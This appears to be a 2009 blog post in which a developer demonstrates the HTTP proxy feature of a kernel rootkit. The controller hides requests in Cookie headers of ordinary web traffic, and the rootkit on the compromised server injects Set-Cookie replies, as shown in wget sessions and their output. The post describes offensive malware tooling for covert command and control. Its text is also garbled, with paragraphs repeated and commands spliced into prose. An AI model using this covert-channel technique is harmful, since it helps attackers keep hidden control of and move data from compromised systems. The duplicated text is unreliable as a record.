I implemented the http channel, and the http proxy feature.
Let me give you an example of the proxy feature works:
First, we open a connection in kelvin to the http channel (the details doesnt interest us here).
I also activate the http proxy option ("proxy_on").
To illustrate the standard behaviour, lets send a http request to the http server of the rootkitet box (192.168.3.2):
Now, we want to call the "test" method in Kelvin. The "test" commands just transfers 100 bytes of data to rheya, and expects 100 bytes in return in the reply.
Kelvin creates the solyaris request, and is waiting (blocks) to receive an suitable HTTP request. Nothing has been sent for this command until now.
We generate the http traffic with the same wget command from earlier:
What happened?
As you can see, rheya replied with an "Set-Cookie" line, which is the answer for our solyaris request. The line was inserted in the kernel, after apache created its reply (the standard page doesnt include any cookies, of course).
The reason it inserted the "Set-Cookie" line was because Kelvin intercepted the http request from wget in its proxy, and transparently added a "Cookie:" line, which's content is the solyaris request it generated.
Additional to wget, Kelvin also interpreted the http reply, and found the answer for his rheya "test" request:
This is just the PoC. There are a lot of rough edges, which will be cleaned out in the next few weeks.
Of course, instead of wget, one can also use a normal browser like firefox, or even a web site crawler, to automate the transfer of data to and from the rootkit.
Let me give you an example of the proxy feature works:
First, we open a connection in kelvin to the http channel (the details doesnt interest us here).
I also activate the http proxy option ("proxy_on").
To illustrate the standard behaviour, lets send a http request to the http server of the rootkitet box (192.168.3.2):
dobin@unreal ~ $ export http_proxy="localhost:8080"As you can see, wget retrieves index.html from the standard apache installation, with cookies disabled, and prints the http header and html sourcecode to stdout. It uses our local rheya proxy (localhost:8080). No cookies sent or received, as this is just a normal .html file.
dobin@unreal ~ $ wget -O - --no-cookies -S http://192.168.3.2:/index.html | cat
--2009-04-24 19:33:56-- http://192.168.3.2/index.html
Resolving localhost... 127.0.0.1, ::1
Connecting to localhost|127.0.0.1|:8080... connected.
Proxy request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 24 Apr 2009 15:33:55 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.7e-p1 DAV/2
Last-Modified: Fri, 17 Apr 2009 22:58:53 GMT
ETag: "5c220-2c-467c81fe40540"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
Length: 44 [text/html]
Saving to: `STDOUT'
100%[========================================>] 44 --.-K/s in 0s
2009-04-24 19:33:56 (15.4 MB/s) - `-' saved [44/44]
<html><body><h1>It works!</h1></body></html>
Now, we want to call the "test" method in Kelvin. The "test" commands just transfers 100 bytes of data to rheya, and expects 100 bytes in return in the reply.
Kelvin creates the solyaris request, and is waiting (blocks) to receive an suitable HTTP request. Nothing has been sent for this command until now.
We generate the http traffic with the same wget command from earlier:
dobin@unreal ~ $ wget -O - --no-cookies -S http://192.168.3.2:/index.html?ABCD | catThe only difference between this wget request and the one earlier is the "Set-Cookie:" line.
--2009-04-24 19:37:24-- http://192.168.3.2/index.html?ABCD
Resolving localhost... 127.0.0.1, ::1
Connecting to localhost|127.0.0.1|:8080... connected.
Proxy request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 24 Apr 2009 15:37:23 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.7e-p1 DAV/2
Last-Modified: Fri, 17 Apr 2009 22:58:53 GMT
ETag: "5c220-2c-467c81fe40540"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
Set-Cookie: statusCode=1; requestID=0; dataLen=100; data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
Length: 44 [text/html]
Saving to: `STDOUT'
100%[========================================>] 44 --.-K/s in 0s
2009-04-24 19:37:24 (17.0 MB/s) - `-' saved [44/44]
<html><body><h1>It works!</h1></body></html>
What happened?
As you can see, rheya replied with an "Set-Cookie" line, which is the answer for our solyaris request. The line was inserted in the kernel, after apache created its reply (the standard page doesnt include any cookies, of course).
The reason it inserted the "Set-Cookie" line was because Kelvin intercepted the http request from wget in its proxy, and transparently added a "Cookie:" line, which's content is the solyaris request it generated.
Additional to wget, Kelvin also interpreted the http reply, and found the answer for his rheya "test" request:
This is just the PoC. There are a lot of rough edges, which will be cleaned out in the next few weeks.
Of course, instead of wget, one can also use a normal browser like firefox, or even a web site crawler, to automate the transfer of data to and from the rootkit.
Leave a comment